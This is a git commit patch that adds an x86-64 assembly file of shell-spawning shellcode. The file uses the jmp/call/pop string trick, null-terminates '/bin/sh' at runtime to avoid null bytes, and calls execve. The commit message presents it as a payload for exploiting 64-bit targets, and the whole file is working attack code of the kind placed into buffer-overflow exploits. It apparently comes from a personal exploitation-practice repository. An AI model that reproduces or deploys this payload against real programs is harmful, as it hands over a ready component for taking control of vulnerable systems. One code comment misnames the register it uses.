From bd18cd8c67fd97f6bf0dceffae68799730ec582c Mon Sep 17 00:00:00 2001
From: toni <matzeton@googlemail.com>
Date: Sun, 12 Apr 2015 17:21:18 +0200
Subject: exploiting x64's as well

---
 shellcode/execve_x64.asm | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 shellcode/execve_x64.asm

(limited to 'shellcode/execve_x64.asm')

diff --git a/shellcode/execve_x64.asm b/shellcode/execve_x64.asm
new file mode 100644
index 0000000..6048796
--- /dev/null
+++ b/shellcode/execve_x64.asm
@@ -0,0 +1,20 @@
+BITS 64
+
+
+; do the 'string trick'
+jmp short string
+
+code:
+xor		rax,rax
+pop		rdi		; pop the addr of the string intro esi (stack pointer register)
+mov byte	[rdi + 7], al	; null-terminate the string
+push		rdi
+mov		rsi,rsp
+push		rax
+mov		rdx,rsp
+mov byte	al,59		; execv
+syscall
+
+string:
+call code
+db '/bin/sh' , 0xFF
-- 
cgit v1.2.3